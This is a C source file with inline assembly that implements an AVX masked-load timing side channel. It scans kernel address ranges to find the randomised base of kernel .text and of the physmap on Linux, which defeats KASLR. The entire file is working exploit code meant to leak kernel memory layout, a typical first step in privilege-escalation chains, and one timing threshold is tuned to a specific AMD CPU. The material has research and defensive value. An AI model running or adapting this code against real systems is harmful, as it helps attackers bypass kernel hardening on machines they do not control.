/*
    AVX timing side-channel to break .text and physmap KASLR on PML4 Linux
    Author: zolutal
*/

#define _GNU_SOURCE
#include <alloca.h>
#include <fcntl.h>
#include <inttypes.h>
#include <memory.h>
#include <sched.h>
#include <stdlib.h>
#include <unistd.h>
#include <x86intrin.h>

// --------- MACRO HELL START -----------

/*
 * ASM_INTEL - emit a basic (operand-less) __asm__ statement written in
 * Intel syntax.
 *
 * asm_code must be one or more adjacent string literals; they are pasted
 * between a ".intel_syntax noprefix" directive and a ".att_syntax prefix"
 * directive, so the assembler is switched back to AT&T syntax once the
 * snippet ends.
 */
#define ASM_INTEL(asm_code) \
    __asm__ ( \
        ".intel_syntax noprefix;" \
        asm_code \
        ".att_syntax prefix;" \
    )

/*
 * ASM_INTEL_VOLATILE - extended-asm counterpart of ASM_INTEL.
 *
 * Wraps asm_code (string literals) in the same Intel/AT&T syntax switch,
 * marks the statement __volatile__, and forwards the caller-supplied
 * output operands, input operands and clobber list unchanged.
 */
#define ASM_INTEL_VOLATILE(asm_code, outputs, inputs, clobbers) \
    __asm__ __volatile__ ( \
        ".intel_syntax noprefix;" \
        asm_code \
        ".att_syntax prefix;" \
        : outputs \
        : inputs \
        : clobbers \
    )

/*
 * ASM_FUNC - define a global function entirely in Intel-syntax assembly.
 *
 * Expands to a file-scope ASM_INTEL block that selects the .text section,
 * declares func_name as a global symbol of type @function, places the
 * func_name label, and then emits `instructions` (string literals) verbatim.
 * No prologue/epilogue is generated: the instructions must contain their
 * own "ret". A matching C prototype has to be declared separately.
 *
 * NOTE: the expansion already ends in ';', so writing `ASM_FUNC(...);`
 * leaves an extra empty ';' at file scope.
 */
#define ASM_FUNC(func_name, instructions) \
    ASM_INTEL ( \
       ".section .text;" \
       ".global " #func_name ";" \
       ".type " #func_name ", @function;" \
       #func_name ":" \
       instructions \
    );

// ---------- MACRO HELL END ------------

/*
 * maccess - perform one 8-byte load from addr.
 *
 * The loaded value lands in rax and is discarded (the C prototype returns
 * void); only the memory access itself matters. addr is read from rdi,
 * i.e. the first integer argument under the System V x86-64 ABI.
 * addr must be readable, since this is an ordinary load.
 */
void maccess(void *addr);
ASM_FUNC(maccess,
    "mov rax, [rdi];"
    "ret;"
);


/*
 * clflush - flush the cache line containing addr.
 *
 * Issues clflush on the address passed in rdi, followed by an mfence
 * before returning.
 */
void clflush(void *addr);
ASM_FUNC(clflush,
    "clflush [rdi];"
    "mfence;"
    "ret;"
);

/*
 * time_probe - measure how long one 8-byte load from addr takes.
 *
 * Reads the timestamp counter before and after a load from the address in
 * rdi and returns the difference (end - start) in rax. addr must be
 * readable, since this is an ordinary load.
 */
uint64_t time_probe(void *addr);
ASM_FUNC(time_probe,
    // rbx holds the start timestamp below; it and rdx are restored on exit
    "push rbx;"
    "push rdx;"
    "mfence;"

        // start timestamp: rdtsc returns it split across edx:eax,
        // combine into one 64-bit value and park it in rbx
        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "mov rbx, rdx;"

        // the access being timed
        "mov rax, [rdi];"
        "lfence;"

        // end timestamp, combined into rdx
        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "lfence;"

    // return value = end - start
    "sub rdx, rbx;"
    "mov rax, rdx;"

    "pop rdx;"
    "pop rbx;"
    "ret;"
);

/*
 * time_flush - measure how long a clflush of addr takes.
 *
 * Reads the timestamp counter before and after a clflush of the address in
 * rdi and returns the difference (end - start) in rax.
 */
uint64_t time_flush(void *addr);
ASM_FUNC(time_flush,
    // rbx holds the start timestamp below; it and rdx are restored on exit
    "push rbx;"
    "push rdx;"
    "lfence;"

        // start timestamp: combine edx:eax into 64 bits, keep it in rbx
        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "mov rbx, rdx;"

        // the operation being timed
        "clflush [rdi];"
        "lfence;"

        // end timestamp, combined into rdx
        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "lfence;"

    // return value = end - start
    "sub rdx, rbx;"
    "mov rax, rdx;"

    "pop rdx;"
    "pop rbx;"
    "ret;"
);

/*
 * time_masked_avx - time a masked AVX load from addr with an all-zero mask.
 *
 * Executes "vmaskmovps xmm1, xmm2, [rdi]" with xmm2 cleared to zero, so no
 * element is selected for loading, and returns in rax the timestamp-counter
 * difference measured around that instruction. Per the instruction's
 * documented behaviour, masked-off elements do not raise faults, which is
 * what lets callers pass addresses they cannot normally read.
 *
 * xmm0 and xmm2 are saved and restored. xmm1 (the load destination) is
 * overwritten and NOT restored.
 */
uint64_t time_masked_avx(void *addr);
ASM_FUNC(time_masked_avx,
    // return address + three 8-byte pushes leave rsp 16-byte aligned,
    // which the movdqa spills below require
    "push rbp;" // for 16 byte alignment
    "push rbx;"
    "push rdx;"

    // spill xmm0 and xmm2 to a 32-byte stack scratch area
    "sub rsp, 32;"
    "movdqa [rsp], xmm0;"
    "movdqa [rsp + 16], xmm2;"

    // xmm2 becomes the all-zero mask (the movaps is immediately
    // overwritten by the xorps and has no lasting effect)
    "movaps xmm2, xmm0;"
    "xorps xmm2, xmm2;"
    "lfence;"

        // start timestamp: combine edx:eax into 64 bits, keep it in rbx
        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "mov rbx, rdx;"

        // the masked load being timed
        "vmaskmovps xmm1, xmm2, [rdi];"
        "lfence;"

        // end timestamp, combined into rdx
        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"

    // return value = end - start
    "sub rdx, rbx;"
    "mov rax, rdx;"

    // restore the spilled vector registers and release the scratch area
    "movdqa xmm0, [rsp];"
    "movdqa xmm2, [rsp + 16];"
    "add rsp, 32;"

    "pop rdx;"
    "pop rbx;"
    "pop rbp;"
    "ret;"
);

/*
 * probe_ktext - pick the most likely kernel .text address by timing.
 *
 * Walks the 1 GiB window [0xffffffff80000000, 0xffffffffc0000000) in 1 MiB
 * steps (1024 candidates). Every candidate is timed with time_masked_avx()
 * for `dummy_iterations` unrecorded warm-up rounds followed by `iterations`
 * recorded rounds; the recorded timings are averaged per candidate and the
 * candidate with the smallest average is selected (the first one wins on
 * ties).
 *
 * @offset: subtracted from the selected candidate address before returning
 *          (presumably the distance between the kernel base and the slot
 *          expected to time fastest -- confirm with the caller).
 *
 * Returns the selected candidate address minus @offset.
 */
uint64_t probe_ktext(uint64_t offset)
{
    const uint64_t kernel_lower_bound = 0xffffffff80000000;
    const uint64_t kernel_upper_bound = 0xffffffffc0000000;
    const uint64_t step = 0x100000;
    const int dummy_iterations = 5;
    const int iterations = 100;
    const int arr_size = (kernel_upper_bound - kernel_lower_bound) / step;

    uint64_t scan_start = kernel_lower_bound;

    // 1024 slots * 8 bytes = 8 KiB, small enough to live on the stack.
    uint64_t *data = alloca(arr_size * sizeof *data);
    // alloca() returns uninitialised memory and the loop below accumulates
    // with +=, so the per-slot sums have to start from zero.
    memset(data, 0, arr_size * sizeof *data);

    uint64_t min = UINT64_MAX, addr = UINT64_MAX;

    for (int i = 0; i < iterations + dummy_iterations; i++) {
        for (uint64_t idx = 0; idx < (uint64_t)arr_size; idx++)
        {
            uint64_t test = scan_start + idx * step;
            // syscall number 104 (getgid on x86-64 Linux); the result is
            // ignored -- presumably issued only to enter the kernel right
            // before each measurement.
            syscall(104);
            uint64_t time = time_masked_avx((void *)test);
            // the first dummy_iterations rounds are warm-up and not recorded
            if (i >= dummy_iterations)
                data[idx] += time;
        }
    }

    // average each slot and keep the address of the fastest one
    for (int i = 0; i < arr_size; i++) {
        data[i] /= iterations;
        if (data[i] < min)
        {
            min = data[i];
            addr = scan_start + i * step;
        }
    }
    return addr - offset;
}

/*
 * probe_phys - pick the most likely physmap (direct map) address by timing.
 *
 * Walks [0xffff887f00000000, 0xffffa10000000000) in 1 GiB steps. Every
 * candidate is timed with time_masked_avx() for `dummy_iterations`
 * unrecorded warm-up rounds followed by `iterations` recorded rounds. A
 * recorded round whose timing differs from the hard-coded value 0xbd adds a
 * fixed penalty to that candidate's score; the candidate with the lowest
 * averaged score is selected (the first one wins on ties).
 *
 * @offset: subtracted from the selected candidate address before returning.
 *
 * Returns the selected candidate address minus @offset. If the score table
 * cannot be allocated no candidate is selected and UINT64_MAX - @offset is
 * returned.
 */
uint64_t probe_phys(uint64_t offset)
{
    const uint64_t phys_lower_bound = 0xffff887f00000000;
    const uint64_t phys_upper_bound = 0xffffa10000000000;
    const uint64_t step = 0x40000000;
    const int dummy_iterations = 20;
    const int iterations = 200;
    const int arr_size = (phys_upper_bound - phys_lower_bound) / step;

    uint64_t scan_start = phys_lower_bound;

    uint64_t min = UINT64_MAX, addr = UINT64_MAX;

    // calloc() hands back zeroed score slots and reports failure as NULL;
    // bail out instead of writing through a NULL pointer.
    uint64_t *data = calloc((size_t)arr_size, sizeof *data);
    if (data == NULL)
        return addr - offset;

    for (int i = 0; i < iterations + dummy_iterations; i++) {
        for (uint64_t idx = 0; idx < (uint64_t)arr_size; idx++)
        {
            uint64_t test = scan_start + idx * step;
            // syscall number 104 (getgid on x86-64 Linux); the result is
            // ignored -- presumably issued only to enter the kernel right
            // before each measurement.
            syscall(104);
            uint64_t time = time_masked_avx((void *)test);

            // 0xbd works for an AMD Ryzen 7 PRO 6850U
            // TODO: how do we make this more generic...
            if (i >= dummy_iterations && time != 0xbd) {
                // the value here really should not matter, and yet...
                data[idx] += 0x200;
            }
        }
    }

    // average each slot's score and keep the address of the lowest one
    for (int i = 0; i < arr_size; i++) {
        data[i] /= iterations;
        if (data[i] < min)
        {
            min = data[i];
            addr = scan_start + i * step;
        }
    }
    free(data);
    return addr - offset;
}
